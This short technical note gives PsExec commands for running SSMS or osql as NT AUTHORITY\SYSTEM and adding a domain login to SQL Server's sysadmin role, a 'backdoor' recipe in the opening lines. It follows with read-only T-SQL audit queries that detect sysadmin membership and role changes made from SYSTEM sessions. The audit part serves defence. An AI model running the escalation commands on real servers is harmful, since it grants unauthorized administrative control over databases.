Command Line: Backdoor into SQL

PSEXEC -s -i ssms.exe
EXEC sys.sp_addsrvrolemember @loginame = N'CHNET\ADMINUser', @rolename = N'sysadmin';


OR

PSEXEC -s -i \\server cmd.exe
osql -E -Q "EXEC sys.sp_addsrvrolemember @loginame = N'CHNET\AdminUser', @rolename = N'sysadmin';"


Use PsTools' PsExec with the -s -i options to run SSMS, and you'll be connected as "NT AUTHORITY\SYSTEM".
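
The commands above only succeed while NT AUTHORITY\SYSTEM is itself a member of sysadmin, which SQL Server 2012 and later no longer set up by default. The following T-SQL is an added audit example, not part of the original note: it lists current sysadmin members and pulls sysadmin membership changes from the default trace; the column aliases and "finding" labels are illustrative.

```sql
-- Added audit example (not from the original note). Read-only queries.

-- 1. Current sysadmin members. If NT AUTHORITY\SYSTEM appears here, any
--    process running as SYSTEM on the host connects with sysadmin rights.
SELECT  m.name      AS login_name,
        m.type_desc AS login_type,
        m.is_disabled,
        m.create_date,
        CASE WHEN m.name = N'NT AUTHORITY\SYSTEM'
             THEN 'SYSTEM is sysadmin' ELSE '' END AS finding
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name = N'sysadmin'
ORDER BY m.name;

-- 2. sysadmin grants and removals recorded by the default trace.
--    EventClass 108 = Audit Add Login to Server Role Event.
--    Only the current trace file and later rollovers are read, so older
--    changes may already have aged out.
DECLARE @trace nvarchar(260) =
    (SELECT TOP (1) path FROM sys.traces WHERE is_default = 1);

IF @trace IS NULL
    PRINT 'Default trace is disabled; no role-change history available here.';
ELSE
    SELECT  t.StartTime,
            t.LoginName       AS changed_by,
            t.HostName,
            t.ApplicationName,
            t.TargetLoginName AS login_changed,
            CASE t.EventSubClass WHEN 1 THEN 'ADD' WHEN 2 THEN 'DROP' END AS action,
            CASE WHEN t.LoginName = N'NT AUTHORITY\SYSTEM'
                 THEN 'made from a SYSTEM session' ELSE '' END AS finding
    FROM    sys.fn_trace_gettable(@trace, DEFAULT) AS t
    WHERE   t.EventClass = 108
      AND   t.RoleName = N'sysadmin'
    ORDER BY t.StartTime DESC;
```

A row in the second result with changed_by = NT AUTHORITY\SYSTEM and an application name of SSMS or osql matches the pattern this note describes.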